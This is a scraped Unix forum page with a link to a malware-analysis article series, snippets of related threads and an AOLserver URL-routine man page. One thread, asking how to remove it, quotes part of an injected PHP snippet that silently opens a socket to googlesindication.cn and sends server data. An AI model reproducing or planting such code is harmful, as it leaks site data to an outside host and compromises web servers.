08-04-2010
How to analyze malicious code
A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work:
These 2 Users Gave Thanks to pludi For This Post:
8 More Discussions You Might Find Interesting
1. Shell Programming and Scripting
I have a file which contains records in the format of
2006-08-25 12:06:13|ABC|93
2006-08-25 12:45:55|ABC|203
2006-08-25 01:48:19|DEF|156
2006-08-25 01:49:09|ABC|12798
2006-08-25 02:49:59|GHL|4109
2006-08-25 03:50:50|DEF|234
where the format is "arrive time"|"message type"|"processing... (3 Replies)
Discussion started by: mpang_
3 Replies
2. Shell Programming and Scripting
Hello,
Please advise a script/command to remove the following line for a file
<?php
error_reporting(0);
$fn = "googlesindication.cn";
$fp = fsockopen($fn, 80, $errno, $errstr, 15);
if (!$fp) {
} else {
$query='site='.$_SERVER;
$out = "GET /links.php?".$query." HTTP/1.1\r\n";
... (5 Replies)
Discussion started by: fed.linuxgossip
5 Replies
3. Solaris
Hi Gurus,
I have installed the stuff needed for patchdiag for patching, its working okay , however after execution of pathcdiag.sparc i am unable to understand the summury which is produced at the end.
Please help !
Thanks (3 Replies)
Discussion started by: kumarmani
3 Replies
4. Shell Programming and Scripting
Hello
I ask you how to make a
Anti-malicious files and viruses
Or if one of you a small example of the work on the same place and I hope my request
I want a small patch or the process of examination Virus
http://www.google.jo/images/cleardot.gif
---------- Post updated... (1 Reply)
Discussion started by: x-zer0
1 Replies
5. Programming
Hi, I have two files:
Input_file1.txt
124
235
152
178
156
142
178
163
159
Input_file2.txt
124|5623
452|6698
178|9995
235|7542
159|8852 (1 Reply)
Discussion started by: cpp_beginner
1 Replies
6. Solaris
Hi,
Is there any tool is available for analyzing Oracle X86 snapshot output.
Thanks in advance. (1 Reply)
Discussion started by: sunnybee
1 Replies
7. Shell Programming and Scripting
Hello,
i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin:
Posting links to pastebin scripts are forbidden at this site.
Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Discussion started by: postcd
1 Replies
8. Debian
Relative newbie to Linux so please be kind and assume I've done little in the way of command line but i have been thrusted into this position.
Here goes. There is a perl script on my box that is using me as a mail server. It is contacting other mail servers to the point of slowing down the box.... (20 Replies)
Discussion started by: dadprpus
20 Replies
LEARN ABOUT DEBIAN
ns_skipurl
Ns_Url(3aolserver) AOLserver Library Procedures Ns_Url(3aolserver)
__________________________________________________________________________________________________________________________________________________
NAME
Ns_AbsoluteUrl, Ns_ParseUrl, Ns_RelativeUrl, Ns_SkipUrl - URL manipulation routines
SYNOPSIS
#include "ns.h"
int
Ns_AbsoluteUrl(Ns_DString *pds, char *url, char *baseurl)
int
Ns_ParseUrl(char *url, char **pprotocol, char **phost,
char **pport, char **ppath, char **ptail)
char *
Ns_RelativeUrl(char *url, char *location)
char *
Ns_SkipUrl(Ns_Request *request, int n)
_________________________________________________________________
DESCRIPTION
Ns_AbsoluteUrl(pds, url, baseurl)
Construct an URL based on baseurl but with as many parts of the incomplete url as possible. Return NS_OK or NS_ERROR.
Ns_ParseUrl(url, pprotocol, phost, pport, ppath, ptail)
Parse a URL into its component parts. Pointers to the protocol, host, port, path, and "tail" (last path element) will be set by ref-
erence in the passed-in pointers. The passed-in url will be modified.
Ns_RelativeUrl(url, location)
If the url passed in is for this server, then the initial part of the URL is stripped off. e.g., on a server whose location is
http://www.foo.com, Ns_RelativeUrl of "http://www.foo.com/hello" will return "/hello". Returns a pointer to the beginning of the
relative url in the passed-in url, or NULL if error. Will set errno on error.
Ns_SkipUrl(request, n)
Return a pointer n elements into the request's url.
SEE ALSO
nsd(1), info(n)
KEYWORDS
AOLserver 4.0 Ns_Url(3aolserver)